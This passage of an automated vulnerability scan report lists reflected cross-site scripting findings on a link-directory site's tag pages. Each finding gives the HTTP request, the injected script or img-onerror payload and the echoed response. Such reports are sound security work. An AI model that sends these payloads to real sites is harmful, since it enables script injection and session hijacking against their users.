<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : search.php/fdbd1<img src=a onerror=alert(1)>608f8d056dd]</td>
...[SNIP]...

2.4398. http://www.resellerbase.com/tag/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload aaed2</title><img%20src%3da%20onerror%3dalert(1)>370aa650ae0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aaed2</title><img src=a onerror=alert(1)>370aa650ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php/aaed2</title><img%20src%3da%20onerror%3dalert(1)>370aa650ae0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: search.php/aaed2</title><img src=a onerror=alert(1)>370aa650ae0</title>
...[SNIP]...

2.4399. http://www.resellerbase.com/tag/seo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/seo

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e1ff<script>alert(1)</script>b8ab21b1769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9e1ff<script>alert(1)</script>b8ab21b1769/seo HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9e1ff<script>alert(1)</script>b8ab21b1769/seo was not found on this server.</p>
...[SNIP]...

2.4400. http://www.resellerbase.com/tag/sex [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d608f<script>alert(1)</script>f51c239180ea174d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd608f<script>alert(1)</script>f51c239180ea174d1/sex?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd608f<script>alert(1)</script>f51c239180ea174d1/sex?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4401. http://www.resellerbase.com/tag/sex [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 738e7<script>alert(1)</script>3fb507e2afc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag738e7<script>alert(1)</script>3fb507e2afc/sex HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag738e7<script>alert(1)</script>3fb507e2afc/sex was not found on this server.</p>
...[SNIP]...

2.4402. http://www.resellerbase.com/tag/sex [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2c97<img%20src%3da%20onerror%3dalert(1)>3280a3016044a12a was submitted in the REST URL parameter 2. This input was echoed as b2c97<img src=a onerror=alert(1)>3280a3016044a12a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/sexb2c97<img%20src%3da%20onerror%3dalert(1)>3280a3016044a12a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sexb2
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : sexb2c97<img src=a onerror=alert(1)>3280a3016044a12a]</td>
...[SNIP]...

2.4403. http://www.resellerbase.com/tag/sex [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1fbce</title><img%20src%3da%20onerror%3dalert(1)>ee34a9fc2a2 was submitted in the REST URL parameter 2. This input was echoed as 1fbce</title><img src=a onerror=alert(1)>ee34a9fc2a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sex1fbce</title><img%20src%3da%20onerror%3dalert(1)>ee34a9fc2a2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex1fbce</title><img src=a onerror=alert(1)>ee34a9fc2a2</title>
...[SNIP]...

2.4404. http://www.resellerbase.com/tag/sex [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b99ca<img%20src%3da%20onerror%3dalert(1)>c9978f9236 was submitted in the REST URL parameter 2. This input was echoed as b99ca<img src=a onerror=alert(1)>c9978f9236 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sexb99ca<img%20src%3da%20onerror%3dalert(1)>c9978f9236 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sexb9
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : sexb99ca<img src=a onerror=alert(1)>c9978f9236]</td>
...[SNIP]...

2.4405. http://www.resellerbase.com/tag/sex [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 560fe</title><img%20src%3da%20onerror%3dalert(1)>67e84b363ff2c2d9f was submitted in the REST URL parameter 2. This input was echoed as 560fe</title><img src=a onerror=alert(1)>67e84b363ff2c2d9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/sex560fe</title><img%20src%3da%20onerror%3dalert(1)>67e84b363ff2c2d9f?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex560fe</title><img src=a onerror=alert(1)>67e84b363ff2c2d9f</title>
...[SNIP]...

2.4406. http://www.resellerbase.com/tag/sex+shop [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex+shop

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d963d<script>alert(1)</script>4de84c32c48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd963d<script>alert(1)</script>4de84c32c48/sex+shop HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:55:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd963d<script>alert(1)</script>4de84c32c48/sex+shop was not found on this server.</p>
...[SNIP]...

2.4407. http://www.resellerbase.com/tag/sex+shop [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex+shop

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ddb20<img%20src%3da%20onerror%3dalert(1)>e83c2a65c0b was submitted in the REST URL parameter 2. This input was echoed as ddb20<img src=a onerror=alert(1)>e83c2a65c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sex+shopddb20<img%20src%3da%20onerror%3dalert(1)>e83c2a65c0b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex s
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : sex shopddb20<img src=a onerror=alert(1)>e83c2a65c0b]</td>
...[SNIP]...

2.4408. http://www.resellerbase.com/tag/sex+shop [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex+shop

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3f44d</title><img%20src%3da%20onerror%3dalert(1)>3dedf11c750 was submitted in the REST URL parameter 2. This input was echoed as 3f44d</title><img src=a onerror=alert(1)>3dedf11c750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sex+shop3f44d</title><img%20src%3da%20onerror%3dalert(1)>3dedf11c750 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex shop3f44d</title><img src=a onerror=alert(1)>3dedf11c750</title>
...[SNIP]...

2.4409. http://www.resellerbase.com/tag/singels [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0368<script>alert(1)</script>58734a5e811958f2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tagb0368<script>alert(1)</script>58734a5e811958f2e/singels?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb0368<script>alert(1)</script>58734a5e811958f2e/singels?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4410. http://www.resellerbase.com/tag/singels [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a42c<script>alert(1)</script>131bfe4a44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2a42c<script>alert(1)</script>131bfe4a44/singels HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2a42c<script>alert(1)</script>131bfe4a44/singels was not found on this server.</p>
...[SNIP]...

2.4411. http://www.resellerbase.com/tag/singels [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 87378</title><img%20src%3da%20onerror%3dalert(1)>e5f95348a0fe43b16 was submitted in the REST URL parameter 2. This input was echoed as 87378</title><img src=a onerror=alert(1)>e5f95348a0fe43b16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/singels87378</title><img%20src%3da%20onerror%3dalert(1)>e5f95348a0fe43b16?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singels87378</title><img src=a onerror=alert(1)>e5f95348a0fe43b16</title>
...[SNIP]...

2.4412. http://www.resellerbase.com/tag/singels [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66a03<img%20src%3da%20onerror%3dalert(1)>a1b8f542f3f was submitted in the REST URL parameter 2. This input was echoed as 66a03<img src=a onerror=alert(1)>a1b8f542f3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/singels66a03<img%20src%3da%20onerror%3dalert(1)>a1b8f542f3f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singe
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : singels66a03<img src=a onerror=alert(1)>a1b8f542f3f]</td>
...[SNIP]...

2.4413. http://www.resellerbase.com/tag/singels [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48ee2<img%20src%3da%20onerror%3dalert(1)>2e64d6a6e8d1365b9 was submitted in the REST URL parameter 2. This input was echoed as 48ee2<img src=a onerror=alert(1)>2e64d6a6e8d1365b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/singels48ee2<img%20src%3da%20onerror%3dalert(1)>2e64d6a6e8d1365b9?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singe
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : singels48ee2<img src=a onerror=alert(1)>2e64d6a6e8d1365b9]</td>
...[SNIP]...

2.4414. http://www.resellerbase.com/tag/singels [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 32a24</title><img%20src%3da%20onerror%3dalert(1)>875c1fb6929 was submitted in the REST URL parameter 2. This input was echoed as 32a24</title><img src=a onerror=alert(1)>875c1fb6929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/singels32a24</title><img%20src%3da%20onerror%3dalert(1)>875c1fb6929 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singels32a24</title><img src=a onerror=alert(1)>875c1fb6929</title>
...[SNIP]...

2.4415. http://www.resellerbase.com/tag/software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e111<script>alert(1)</script>62c9d4d91768b83c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag3e111<script>alert(1)</script>62c9d4d91768b83c4/software?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
